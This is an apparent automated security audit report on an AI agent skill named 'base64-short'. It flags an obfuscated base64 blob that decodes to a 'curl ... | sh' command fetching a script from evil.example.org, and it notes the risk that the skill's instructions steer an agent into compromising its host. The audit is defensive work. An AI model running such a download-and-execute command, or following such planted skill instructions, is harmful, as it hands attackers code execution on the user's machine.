base64-short

Fail

Audited by Snyk on Apr 20, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content intentionally encodes and decodes a remote downloader-and-executor (base64 -> "curl ... | sh"), an obfuscated remote code execution pattern commonly used to install backdoors, run arbitrary commands, and perform supply‑chain or data‑exfiltration actions.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The SKILL.md shows a base64 blob that decodes to a command that runs "curl ...https://evil.example.org/x.sh | sh", which clearly fetches and executes code from a public third-party URL (evil.example.org) as part of the workflow.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).


MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt decodes to a curl ... | sh command that fetches and executes a remote shell script, enabling arbitrary code execution and potential system modifications, so it clearly pushes the agent to compromise the host.

Issues (4)

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 20, 2026, 06:16 AM
Issues
4
Security Audit — snyk — base64-short